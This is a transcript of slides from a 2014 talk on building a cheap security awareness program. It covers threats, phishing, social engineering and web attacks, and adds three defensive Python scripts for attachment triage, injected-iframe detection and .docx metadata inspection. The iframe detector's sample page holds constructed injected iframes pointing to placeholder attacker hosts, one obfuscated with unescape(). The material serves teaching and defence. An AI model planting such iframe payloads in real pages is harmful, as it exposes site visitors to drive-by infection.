building an information security awareness program
DESCRIPTION
Most organizations' Security Awareness Programs suck. They involve 'canned' video presentations or someone in HR explaining computer use policies. Others are extremely expensive and beyond the reach of the budgets of smaller organizations. This talk will show you how to build a Security Awareness Program from scratch for little or no money, and how to engage your users so that they get the most out of the program.
TRANSCRIPT
Building an Information Security Awareness Program
Bill Gardner
Assistant Professor
Department of Integrated Science & Technology
Digital Forensics and Information Assurance Program
Marshall University
Hack3rcon.org
appyide.org
hackersforcharity.org
Image Source: http://blog.rucker.ca/2009/02/youre-doing-it-wrong.html
Image Source: http://www.agilemodeling.com/artifacts/networkDiagram.htm
Copyright 2014 Bill Gardner and Frank Hackett
What is Security Awareness and Training
Why Security Awareness and Training?
Image Source: http://www.thewindowsclub.com/social-engineering-techniques
Getting Management Buy-in
Image Source: https://supportforums.cisco.com/blog/150946/building-strong-security-policies
Getting Management Buy-in
Image Source: https://www.chromeriver.com/postcards/
Getting Management Buy-in
Image Source: https://www.facebook.com/thesfglobe/photos/a.581802245240710.1073741828.578850155535919/601831693237765/?type=1&theater
Getting Management Buy-in
Image Source: http://www.european-coatings.com/Markets-Companies/CPS-Color-increases-colorant-production
Targeted
Image Source: http://theasggroup.com/2012/05/tools-for-salespeople/
Targeted
Image Source: http://www.processmakerblog.com/bpm-2/secrets-automating-department/
Targeted
Image Source: http://www.innovationmanagement.se/2011/05/19/how-to-foster-greater-collaboration-between-innovators-and-the-it-department/
How Often
Image Source: http://integrityhr.com/top-10-violations-investigated-by-the-dol-and-how-to-avoid-them/
How Often
Image Source: http://cheezburger.com/1904315136
How Often
Image Source: http://www.theproducersperspective.com/my_weblog/2012/11/broadways-2012-quarter-2-report.html/i_love_quarterly_reports_mug-p168055427806712929enw9p_400
How Often
Image Source: http://micronarratives.blogspot.com/2010/08/continual-improvement-cycle-quality.html
User Awareness Training Must Be Engaging
Image Source: http://jansimson.com/2011/10/29/omg-that-class-is-so-boring/
User Awareness Training Must Be Engaging
Image Source: https://www.pjrc.com/teensy/projects.html
User Awareness Training Must Be Engaging
Image Source: http://www.cedia.org/in-person-training
User Awareness Training Must Be Engaging
Image Source: https://www.facebook.com/efm.lk/photos/a.132867908531.105751.75172638531/10153169793713532/?type=1&theater
User Awareness Training Must Be Engaging
Image Source: http://pictures.4ever.eu/tag/23829/lot-of-money?pg=2
The First Step of User Awareness Training is Explaining Risk
Image Source: https://www.facebook.com/photo.php?fbid=1415938958687951&set=a.1384739928474521.1073741828.100008155802751&type=1&theater
Cost of A Data Breach
Image Source: https://www.facebook.com/photo.php?fbid=10152535939267845&set=a.130149082844.132252.90859152844&type=1&theater
Why Hack?
• Money – Identity Theft, Credit Card Theft
• Industrial Espionage – Trade Secrets
• Hacktivism
• Cyber War
• Bragging Rights
Image Source: https://nuestropensar.wordpress.com/2010/12/
Threats
• Russian Business Network
• Chinese Hackers
• Hacktivism
• Cyberwar
Image Source: http://feministmormonhousewivespodcast.org/category/threats/
Russian Business Network
• Commonly abbreviated as RBN
• Multi-faceted cybercrime organization
• Specializes in personal identity theft for resale.
Image Source: http://jeffreycarr.blogspot.com/2013/01/rbn-connection-to-kasperskys-red.html
Chinese Hackers
• Hack for nationalistic reasons.
• Some appear to be state sponsored or an unofficial part of the Chinese Army.
• GhostNet
• Google Hack (Operation Aurora)
• APT – Advanced Persistent Threat
Hacktivism
"the nonviolent use of illegal or legally ambiguous digital tools in pursuit of political ends. These tools include web site defacements, redirects, denial-of-service attacks, information theft..."
Image Source: http://www.anonymousartofrevolution.com/2013/08/hacktivism-self-defense-for.html
Cyberwar
• Cyberwarfare refers to politically motivated hacking used to conduct sabotage and espionage.
• It is state sponsored.
• In 2007, Estonia was hit by weeks of denial-of-service attacks widely attributed to Russia.
Image Source: http://www.wired.com/2011/07/make-love-not-cyber-war/
Most Attacks Are Targeted
• Targeted threats are a class of malware or attack aimed at one specific organization or industry.
• Targeted attacks may include threats delivered via e-mail, attacks on exposed network ports and services, zero-day exploits or phishing messages.
Who is responsible for security?
Image Source: http://www.caltrate.co.za/everybody-needs-calcium
Image Source: https://blog.lookout.com/blog/2013/11/12/security-alert-adobe-password-breach/
Passwords
Locking Computers
Attachments
Be cautious of e-mail claiming to contain pictures in attached files: the attachment may actually be a virus or other malware, often an executable named to look like an image. Only open attachments from known senders, and remember that the sender address is easily spoofed, so an unexpected attachment from a known name is still worth confirming out of band.
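The "picture" lure works because users judge an attachment by its name. As an added example, not part of the original slides, the following script makes the check the advice above implies: it compares the claimed extension with the file's leading magic bytes and flags double extensions such as `photo.jpg.exe`. The sample attachments are constructed (a JPEG header and two PE stubs); they are not real malware.

```python
# Added example (not from the slides): triage an e-mail attachment that claims
# to be a picture by comparing its name with its actual content.
IMAGE_MAGIC = {
    b"\xff\xd8\xff": "JPEG image",
    b"\x89PNG\r\n\x1a\n": "PNG image",
    b"GIF87a": "GIF image",
    b"GIF89a": "GIF image",
}
EXECUTABLE_MAGIC = {
    b"MZ": "Windows executable (PE)",
    b"\x7fELF": "ELF executable",
    b"PK\x03\x04": "ZIP container (macro documents, JARs and APKs travel in these)",
}
IMAGE_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}


def sniff_content(data: bytes) -> tuple:
    """Identify a file by its leading magic bytes, not by its name."""
    for magic, label in IMAGE_MAGIC.items():
        if data.startswith(magic):
            return "image", label
    for magic, label in EXECUTABLE_MAGIC.items():
        if data.startswith(magic):
            return "executable", label
    return "unknown", "unrecognised content"


def triage_attachment(filename: str, data: bytes) -> dict:
    """Flag the classic lures: double extensions and image names on executable content."""
    parts = filename.lower().split(".")
    real_ext = parts[-1] if len(parts) > 1 else ""
    # "holiday.jpg.exe": Windows hides the final extension by default, so the
    # user sees "holiday.jpg".
    double_ext = (len(parts) > 2 and parts[-2] in IMAGE_EXTENSIONS
                  and real_ext not in IMAGE_EXTENSIONS)
    kind, label = sniff_content(data)
    reasons = []
    if double_ext:
        reasons.append(f"double extension: shown as .{parts[-2]}, really .{real_ext}")
    if real_ext in IMAGE_EXTENSIONS and kind != "image":
        reasons.append(f"named .{real_ext} but content is {label}")
    if kind == "executable":
        reasons.append(f"executable content: {label}")
    return {"filename": filename, "content": label,
            "suspicious": bool(reasons), "reasons": reasons}


# Constructed sample attachments (not real malware): a genuine JPEG header and
# two PE stubs wearing picture names.
SAMPLES = {
    "beach.jpg": b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32,
    "holiday_photos.jpg.exe": b"MZ\x90\x00" + b"\x00" * 60,
    "cute_cat.png": b"MZ\x90\x00" + b"\x00" * 60,
}

if __name__ == "__main__":
    for name, blob in SAMPLES.items():
        verdict = triage_attachment(name, blob)
        flag = "SUSPICIOUS" if verdict["suspicious"] else "ok"
        print(f"{name:28} {flag:10} {'; '.join(verdict['reasons'])}")
```

The magic-byte check is what a mail gateway does before any signature matching; a file that passes it can still be hostile (a real JPEG can carry an exploit for the viewer), so it narrows the list of attachments worth a closer look rather than clearing them.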
Phishing
Social Engineering
• Not all security breaches are the result of technical attacks.
• In computer and network security people are the weakest link.
• As he outlines in his book "The Art of Deception", convicted computer hacker Kevin Mitnick penetrated computer networks by tricking people into giving him passwords and other confidential information.
No Tech Hacking
• Dumpster Diving – Sometimes confidential documents can be found in the trash.
• Tailgating – Following someone through a locked door.
• Shoulder Surfing – Getting passwords or other confidential information by looking over someone's shoulder.
• Google Hacking – Finding passwords or other confidential information by using Google searches.
• P2P Hacking – Finding passwords or other confidential information on peer-to-peer networks.
No Tech Hacking
Insecure third-party software
• P2P file sharing – Some people share their entire hard drive.
• Instant Messaging – IM is insecure because it was not designed with security in mind.
Adware
Adware, or advertising-supported software, is any software package that automatically plays, displays, or downloads advertisements to a computer after the software is installed or while the application is being used.
Spyware
Some types of adware are also spyware: software that steals personal information when you enter it into legitimate programs or websites, or logs your keystrokes to steal your passwords or other personal information.
Web Attacks
• IFrame attacks
• Cross-site scripting
• Doesn't require the user to click on anything
• Simply visiting a compromised site can cause an infection (a drive-by download)
Two Examples of Web Attacks
• WV State Bar website: http://www.wvbar.org/
• The WV Record: http://www.wvrecord.com/
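The iframe attack on a legitimate site usually looks the same every time: an invisible iframe pointing at an attacker's host is appended to the page, often wrapped in `document.write(unescape('...'))` so it does not show up in a plain text search for "iframe". As an added example, not taken from the slides and not a description of what was on the two sites named above, this script scans a page for iframes that are both hidden and off-site, decoding the `unescape()` trick along the way. The sample page and the hostnames in it are constructed for the example.

```python
# Added example (not from the slides): find hidden, off-site iframes in a page,
# including ones hidden behind document.write(unescape('...')).
from html.parser import HTMLParser
from urllib.parse import urlparse, unquote
import re

# CSS that hides an element outright or pushes it off-screen.
HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden|(?:left|top)\s*:\s*-\d+")
# document.write(unescape('%3Ciframe...')) is the usual obfuscation for injected iframes.
UNESCAPE_CALL = re.compile(r"unescape\(\s*['\"]([^'\"]*)['\"]\s*\)")


class IframeFinder(HTMLParser):
    """Collect every <iframe>, including ones written by script via unescape()."""

    def __init__(self):
        super().__init__()
        self.iframes = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append({name: (value or "") for name, value in attrs})
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # Script bodies arrive here as raw text; decode any unescape() payloads
        # and parse the markup they would have written into the page.
        if not self._in_script:
            return
        for encoded in UNESCAPE_CALL.findall(data):
            nested = IframeFinder()
            nested.feed(unquote(encoded))
            nested.close()
            self.iframes.extend(nested.iframes)


def _tiny(value) -> bool:
    """True for width/height attributes of 0, 1 or 2 pixels."""
    m = re.match(r"\s*(\d+)", value or "")
    return m is not None and int(m.group(1)) <= 2


def classify(attrs: dict, page_host: str) -> dict:
    src = attrs.get("src", "")
    host = urlparse(src).hostname or page_host      # relative src stays on-site
    hidden = (_tiny(attrs.get("width")) and _tiny(attrs.get("height"))) \
        or bool(HIDDEN_STYLE.search(attrs.get("style", "").lower()))
    return {"src": src, "offsite": host != page_host, "hidden": hidden}


def find_injected_iframes(html: str, page_host: str) -> list:
    """Return iframes that are both invisible and pointing at another host."""
    finder = IframeFinder()
    finder.feed(html)
    finder.close()
    return [c for c in (classify(a, page_host) for a in finder.iframes)
            if c["hidden"] and c["offsite"]]


# Constructed sample page (hostnames are made up): one legitimate video embed,
# one zero-size injected iframe, and one injected through unescape().
SAMPLE_PAGE = """<html><head><title>Example Association</title></head><body>
<h1>Members</h1>
<iframe src="https://www.youtube.com/embed/abc" width="560" height="315"></iframe>
<p>Welcome.</p>
<iframe src="http://bad.example.net/in.cgi?3" width="0" height="0" frameborder="0"></iframe>
<script type="text/javascript">document.write(unescape('%3Ciframe%20src%3D%22http%3A%2F%2Fworse.example.net%2Fx.php%22%20style%3D%22display%3Anone%22%3E%3C%2Fiframe%3E'))</script>
</body></html>"""

if __name__ == "__main__":
    for hit in find_injected_iframes(SAMPLE_PAGE, "www.example.org"):
        print("injected iframe ->", hit["src"])
```

The video embed is off-site but visible, so it is left alone; the two zero-size or `display:none` frames pointing elsewhere are what an incident responder would pull the exploit kit URLs from. Run it against a saved copy of your own site's pages as a cheap integrity check between deployments.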
Metadata Awareness
Redlining/Track Changes
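Document metadata and leftover tracked changes leak the author, the machine the file was last edited on, revision counts, and the text someone thought they had deleted. As an added example, not part of the original slides, the following script opens a .docx (which is a ZIP of XML parts) and reports the core-properties metadata together with every tracked insertion and deletion, including the author recorded on each change. The sample document is constructed in memory and contains only the two parts the inspector reads; a real .docx also carries `[Content_Types].xml` and relationship parts.

```python
# Added example (not from the slides): list metadata and tracked changes
# that survive in a .docx file.
import io
import zipfile
import xml.etree.ElementTree as ET

NS = {
    "cp": "http://schemas.openxmlformats.org/package/2006/metadata/core-properties",
    "dc": "http://purl.org/dc/elements/1.1/",
    "dcterms": "http://purl.org/dc/terms/",
    "w": "http://schemas.openxmlformats.org/wordprocessingml/2006/main",
}
W = "{%s}" % NS["w"]


def inspect_docx(blob: bytes) -> dict:
    """Report author/revision metadata and any tracked changes still in the file."""
    with zipfile.ZipFile(io.BytesIO(blob)) as z:
        core = ET.fromstring(z.read("docProps/core.xml"))
        body = ET.fromstring(z.read("word/document.xml"))

    metadata = {}
    for field in ("dc:creator", "cp:lastModifiedBy", "dcterms:created",
                  "dcterms:modified", "cp:revision"):
        el = core.find(field, NS)
        if el is not None and el.text:
            metadata[field] = el.text

    def changes(wrapper, text_tag):
        # <w:ins> wraps inserted runs (<w:t>); <w:del> wraps deleted runs (<w:delText>).
        return [{"author": el.get(W + "author", "?"),
                 "text": "".join(t.text or "" for t in el.iter(W + text_tag))}
                for el in body.iter(W + wrapper)]

    return {"metadata": metadata,
            "inserted": changes("ins", "t"),
            "deleted": changes("del", "delText")}


# Constructed sample document: the earlier, lower offer was "deleted" with
# Track Changes but is still in the file.
CORE_XML = """<cp:coreProperties xmlns:cp="{cp}" xmlns:dc="{dc}" xmlns:dcterms="{dcterms}"
  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <dc:creator>jdoe</dc:creator>
  <cp:lastModifiedBy>Legal-WS12</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2014-08-01T09:12:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2014-08-15T16:40:00Z</dcterms:modified>
  <cp:revision>14</cp:revision>
</cp:coreProperties>""".format(**NS)

DOCUMENT_XML = """<w:document xmlns:w="{w}"><w:body><w:p>
  <w:r><w:t xml:space="preserve">Our offer for the contract is </w:t></w:r>
  <w:del w:id="1" w:author="jdoe" w:date="2014-08-15T16:38:00Z"><w:r><w:delText>$120,000</w:delText></w:r></w:del>
  <w:ins w:id="2" w:author="jdoe" w:date="2014-08-15T16:38:00Z"><w:r><w:t>$150,000</w:t></w:r></w:ins>
  <w:r><w:t>.</w:t></w:r>
</w:p></w:body></w:document>""".format(**NS)


def build_sample_docx() -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("docProps/core.xml", CORE_XML)
        z.writestr("word/document.xml", DOCUMENT_XML)
    return buf.getvalue()


if __name__ == "__main__":
    report = inspect_docx(build_sample_docx())
    for key, value in report["metadata"].items():
        print(f"{key:20} {value}")
    for change in report["deleted"]:
        print(f"deleted by {change['author']}: {change['text']!r}")
    for change in report["inserted"]:
        print(f"inserted by {change['author']}: {change['text']!r}")
```

Running this over outbound documents (or teaching users to use Word's Document Inspector before sending) catches the case the "Redlining/Track Changes" slide is about: the recipient can read the deleted text and see who changed it and when.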
Estimated Publish Date August 18th, 2014
Questions?
Contact Information
• Facebook: https://www.facebook.com/oncee
• Twitter: @oncee
• LinkedIn: http://www.linkedin.com/in/304blogs